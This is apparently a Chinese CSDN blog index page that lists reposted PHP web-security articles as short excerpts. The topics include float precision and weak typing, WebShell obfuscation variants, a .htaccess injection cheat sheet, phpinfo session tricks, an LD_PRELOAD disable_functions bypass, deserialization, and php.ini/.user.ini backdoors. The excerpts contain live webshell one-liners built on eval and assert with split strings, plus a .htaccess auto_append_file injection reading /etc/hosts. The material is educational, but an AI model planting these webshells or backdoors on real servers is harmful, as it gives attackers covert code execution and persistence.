![](https://img-blog.csdnimg.cn/20201014180756927.png?x-oss-process=image/resize,m_fixed,h_64,w_64)
PHP---漏洞
bylfsj
这个作者很懒,什么都没留下…
展开
-
4.1.9. 其它
4.1.9. 其它¶ 4.1.9.1. 低精度¶ php中并不是用高精度来存储浮点数,而是用使用 IEEE 754 双精度格式,造成在涉及到浮点数比较的时候可能会出现预期之外的错误。 比如 php -r "var_dump(0.2+0.7==0.9);" 这行代码的输出是 bool(false) 而不是 bool(true)。这在一些情况下可能出现问题。 4.1.9.2. 弱类型¶ 如果使...转载 2019-10-31 21:29:35 · 453 阅读 · 0 评论 -
WebShell变形
4.1.7. WebShell¶ 4.1.7.1. 常见变形¶ GLOBALS eval($GLOBALS['_POST']['op']); $_FILE eval($_FILE['name']); 拆分 assert(${"_PO"."ST"} ['sz']); 动态函数执行 $k="ass"."ert"; $k(${"_PO"."ST"} ['sz...转载 2019-10-31 21:18:25 · 540 阅读 · 0 评论 -
PHP htaccess注入备忘单
情境 在Apache / mod_php的安装程序中,攻击者能够注入.htaccess(或php.ini或apache配置)。注入目录中设置了AllowOverride Options(或AllowOverride All,这也是很常见的)。 例子 示例1a:文件包含 index.php :(空) .htaccess: php_value auto_append_file /etc/hosts...转载 2019-10-31 21:15:04 · 571 阅读 · 0 评论 -
phpinfo相关漏洞
4.1.5. phpinfo相关漏洞¶ 4.1.5.1. Session.Save¶ PHP的Session默认handler为文件,存储在 php.ini 的 session.save_path 中,若有任意读写文件的权限,则可修改或读取session。 从phpinfo中可获得session位置 4.1.5.2. Session.Upload¶ php.ini默认开启了 session...转载 2019-10-31 21:09:43 · 1376 阅读 · 0 评论 -
无需sendmail:巧用LD_PRELOAD突破disable_functions
*本文原创作者:yangyangwithgnu,本文属FreeBuf原创奖励计划,未经许可禁止转载 摘要:千辛万苦拿到的 webshell 居然无法执行系统命令,怀疑服务端 disable_functions 禁用了命令执行函数,通过环境变量 LD_PRELOAD 劫持系统函数,却又发现目标根本没安装 sendmail,无法执行命令的 webshell 是无意义的,看我如何突破! 半月前逛“已黑网...转载 2019-10-31 21:01:18 · 360 阅读 · 0 评论 -
PHP反序列化漏洞
又到了金三银四跳槽季,很多小伙伴都开始为面试做准备,今天小编就给大家分享一个网安常见的面试问题:PHP反序列化漏洞。 虽然PHP反序列化漏洞利用的条件比较苛刻,但是一旦被利用就会产生很严重的后果,所以很多公司都比较关注这个技能点,小伙伴们一定要掌握哦。 PHP序列化与反序列化介绍 什么是序列化与反序列化 维基百科中这样定义:序列化(seri...转载 2019-09-27 18:54:55 · 384 阅读 · 0 评论 -
后门---php.ini/.htaccess/.user.ini-------------------利用 auto_prepend_file 和 include_path
From:http://www.cnblogs.com/iamstudy/articles/php_ini_backdoor.html 原理 php.ini中有这几种模式: PHP_INI_*模式的定义 文件配置属性 官方解释 auto_prepend_file 意味这是在php脚本执行前会执行这个参数设置的脚本,然后这个参数的脚本所在目录...转载 2019-10-31 20:03:45 · 813 阅读 · 0 评论